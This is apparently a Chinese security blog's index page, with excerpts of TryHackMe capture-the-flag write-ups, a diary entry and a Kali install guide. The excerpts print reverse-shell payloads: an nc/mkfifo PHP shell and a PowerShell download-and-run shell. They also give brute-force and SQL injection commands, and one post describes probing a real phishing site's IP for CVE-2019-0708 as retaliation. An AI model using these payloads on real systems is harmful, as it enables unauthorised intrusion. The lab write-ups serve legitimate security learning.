MikannseのSekai

分析PCAP他们用来上传反向shell的页面的URL是什么？ 上传的话应该要涉及到http,那就过滤http协议 找到一条疑似shell的数据，追踪http流 那么URL就是/development/ 攻击者使用了什么有效载荷来获得访问权限？ 就是上面我划出来的那一条，reverse shell <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?> 攻击者使用了什么密码来保护c？ 应该是连接shell之后，攻击者一系列的操作，那追踪TCP流看看，翻到第三个，追踪TCP流 可以看到一系列的操作 密码就是whenevernoteartinstant 攻击者如何建立持久性？ 上面那个数据包往下翻 应该是下了一个ssh的后门文件 https://github.com/NinjaJc01/ssh-backdoor 使用快速通道单词表，有多少系统密码是可以破解 ...

端口扫描 Web 打开网站的根目录是一个Apache的页面 日常扫一下目录，再结合一下nmap扫描的结果 进/blog页面看一下 应该是一个博客界面，根据上面漏洞扫描的结果等可以知道是一个WP搭建的站点，那么能利用的点就很多了，Wpscan什么的也能用。看下有没有可以利用的信息。这个页面似乎没有。 那就直接进登录界面 看看能不能用WPscan列举一下用户 wpscan --url http://internal.thm/wordpress/ --enumerate u 发现一个admin用户 还有WP使用的主题 没有插件 试着暴力破解一下密码 wpscan --url http://internal.thm/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin 密码是my2boys 发现成功登录后台 Getshell在之前可以得到WP的主题是tentyseventeenn,可以知道有一个非常著名的漏洞：在Appearance中可以修改主题 试着将index.php改成reverseshell（注意是PHP ...

端口扫描 用nmap自带的脚本扫一下有没有漏洞，发现了有一个RCE漏洞 Web 简单扫一下目录 大概率是没什么东西了 因为看到了3389这个端口开着，在前几篇的一个《钓鱼网站简单渗透测试》中就碰到过这玩意，还是挺熟悉的，那就直接用msf看看漏洞可不可用 发现好像没有 SMB服务那就直接从nmap发现的漏洞入手吧 use 4set LHOST tun0set RHOST 10.10.109.175run 发现运行不了 才发现这个房间好像不让用msf捏 查了一下，这好像是很有名的“永恒之蓝”漏洞？ 那就先试着不用msf 既然是SMB服务上的漏洞，先试着用enum4linux扫描 发现也是什么都没有 smbclient -L 10.10.109.175 用来列举共享资源，发现不用密码（直接回车）就可以列举 也是不用密码就可以连接 get下来的password是这玩意，大概是base64编码过的 Bob - !P@$$W0rD!123 Bill - Juw4nnaM4n420696969!$$$ 解码出来是这些东西,猜测是两个用户名和密码 上面扫描过程中发现3389 ...

端口扫描 Web谁抢了银行：SpiderMan 我直接:????? 日常进行目录扫描 gobuster dir -u http://10.10.74.159 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 扫出来大概是这些目录 THM问joomla的版本是多少，打开Wap插件看一下也确实是这个CMS 可以用joomscan来判断版本，kali中sudo apt-get install joomscan安装 joomscan -u http://10.10.74.159/ 开启扫描 发现版本是3.7.0，而且也能列出目录 有了版本号就可以找漏洞了 searchsploit joomla 3.7.0 直接上github找个SQL注入的脚本 https://github.com/teranpeterson/Joomblah 得到密码hash $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm hash-identifier竟 ...

端口扫描 SMB服务发现有POP3和IMAP服务，感觉大概率和邮件有关，还是第一次接触这样的靶机 问Miles的邮箱密码，嘶没什么思路，一开始还用hydra来爆破IMAP端口，发现好像不行，看了下THM的提示，Enumerate Samba 于是试着用enum4linux来枚举SMB服务 kali中enum4linux ip 发现一个共享anonymous可以访问 smbclient //ip/共享 进行连接 ls发现了一个文本和一个logs文件夹 把全部get到本地，如get attention.txxt 总之就是所有人的密码被改了什么之类的 log的内容就很吸引人了，像是用户名（密码？） log2和3都是空的，，， Web到这里的线索似乎断了，因为不知道这个用于什么的，感觉方向太多，又是IMAP又是POP3什么的。先进入80的WEB端口看看 就这么一个界面，啥都没有，试着用gobuster爆破下目录 gobuster经常性感觉会出一些网络问题导致丢包。。。 找到个/admin的目录，进去看看，发现访问不了 试了几个发现就squirrelmail能访问，进去是个登录 ...

端口扫描 只开放了两个端口，大概率是在80端口做文章了 Web百度识图：杀手3主人公Agent 47 Sql注入手注在用户名输入: ‘or 1=1 – - 密码不填 查询语句变成 SELECT * FROM users WHERE username = ''or 1=1 -- -' AND password := 前面为真，后面被注释，直接登录 被重定向到portal.php界面 SQLmap直接跟着做 右键保存至文件 在SQLmap中运行 sqlmap -r /home/mikannse/request –dbms=mysql –dump hash:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 用户名:agent47 翻一下上面的记录，另外一个表名是post 密码爆破先识别一下哈希的类型 hash-identifier ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 根据结果大概率是SHA-256 用john ...

​ 博客建立以来第一篇杂谈，打算每个月都写一点东西，总结记录下这个月的一些7788的东西。真的算得上是忙碌的一个月，虽然前后反差还挺大的。从准确来说是从上个月底的黑盾杯和国赛开始一直到前不久刚结束的各种考试，真的算是一直绷着神经硬撑到考试结束233，算是大学以来最忙碌的一段时间吧。每年的六月都算是最喜欢的时期吧，去年是考完高考的放松吧，不知不觉成为带学生已经一年了捏，而且也到了最喜欢的暑期。然后还有“日记周年”的时间，感觉是每一年中最年轻的一个月吧（笑)。考完试还是比较放松的吧，放松但不代表清闲，反而有很多事情想要做，但不是很多事情要被做。憋了一个月的THM瘾犯了，动力满满地疯狂学习+打靶机，还是挺开心的捏。但是放假后的时间几乎除了晚上回宿舍睡觉都呆在图书馆吧，前几天倒是和朋友久违的出去玩了一整天，很放松很开心的感觉，主要想做的事情实在是太多了。搭了一直想搭的博客，然后多多少少都会记录下发布一些文章，留给后人或者同好看233，主要还是想记录下人生什么的。这个月好像前几个都开始看的大江健三郎的《万延元年的FOOTBALL》是这个月一直在看的，真的是难读的一本书啊，也许是自己越来越浮躁而读 ...

端口扫描sudo nmap –min-rate 10000 -p- 10.10.116.243 -Pn 扫描全部端口，设置最小速度为10000 sudo nmap -sT -sV -O -p80,3389 10.10.116.243 -Pn 对指定的端口用TCP协议扫描，扫描版本号和操作系统 Web登录网站 要求得到小丑的名字，直接百度识图，是一部电影，主角叫Pennywise 爆破密码根据THM提示，在登录界面用Hydra爆破密码，账户名猜测为admin 在这之前用bp抓个包，随便输入1 1 将__VIEWSTATE到”Login+in”作为表单数据，Login failed为报错信息（在输入错误的用户名密码搭配时的提示错误信息） 表单路径为/Account/login.aspx 于是最终命令为(字典随便选了一个)： sudo hydra -l admin -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top1000.txt 10.10.116.243 http-post-form "/Accoun ...

Initial Accessnmap扫描端口 浏览器访问8080端口的web服务，发现是一个Jenkins CMS 尝试admin admin 成功登录 也可以用hydra爆破,这里贴一张网上的WP图 稍微在网上搜索下这个比较经典的CMS，就可以知道这有个页面可以上我们RCE https://github.com/samratashok/nishang 利用这其中的Invoke-PowerShellTcp.ps1来进行反向shell 在本地开启Python服务来让靶机下载我们的shell,开启nc来监听反向shell 在靶机上，用powershell脚本来进行反向shell的下载与连接，IP为自己攻击机的IP， powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.17.49.170:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.49.170 -Port 1234 apply,s ...

碎碎念也算小学了几个月的渗透，没想到碰上了钓鱼邮件，这不得练练实战,狠狠得惩罚他( 信息搜集进入网站之后，发现是个QQ邮箱界面,当然看网址就一眼假 先通过ping得到他的真实IP， https://ping.chinaz.com 是38.55.193.233准没错了 拿nmap狠狠地扫他 发现开启了80和3389两个端口,80端口比较平常，试着搜一下ms-wbt-server这个服务，发现了这个文章，竟然有CVE，是windows平台的 https://blog.csdn.net/s619782146/article/details/125540370 通过这个插件可以知道，主机的操作系统也确实是windows，这下可精神了。 开搞尝试搜索CVE-2019-0708，是一个RCE漏洞 打开我们的msf search 0708 先扫描是否真的存在漏铜，所以 use 0 show options，要设置目标的主机 于是:set RHOSTS 38.55.193.233 run 发现存在漏洞！ 下载POC https://github.com/n1xbyte/CVE-2019 ...

跟着CSDN某不良文章操作后kali崩了(恼，又没保存快照。要养成经常保存快照的习惯。在重装的过程中随手水下第一篇博客。 镜像下载下载kali linux镜像，我这里选择23年2月的最新版 https://www.kali.org/ 创建虚拟机 选择Debian 8.x 64(kali基于Debian) 选择虚拟机创建路径，建议放在空间较大的地方 这里根据自己宿主机的内核总数来选，理论上只要小于宿主机内核总数就好，我这里选2+2。 打开任务管理器，打开“性能”。我的是16个逻辑处理器，所以理论上小于16就好（这块还不太懂） 内存根据自己宿主机来选，推荐4G以上，我记得John爆破需要至少4G的内存 选择存储为单个文件，选择磁盘大小，我这里选择100G。建议选大些，可以省去以后扩容磁盘的麻烦（不过学一下还是有必要的）。之前选20G实在是不够用，后面又扩容了。 像打印机这种没什么用的可以移除，然后新CD/DVD，选择下好的kali镜像文件 发现虚拟机已经创建好了，虚拟机的名称可以自己重命名。开启虚拟机。 安装 选择第一个图形化安装，回车 语言自行选 ...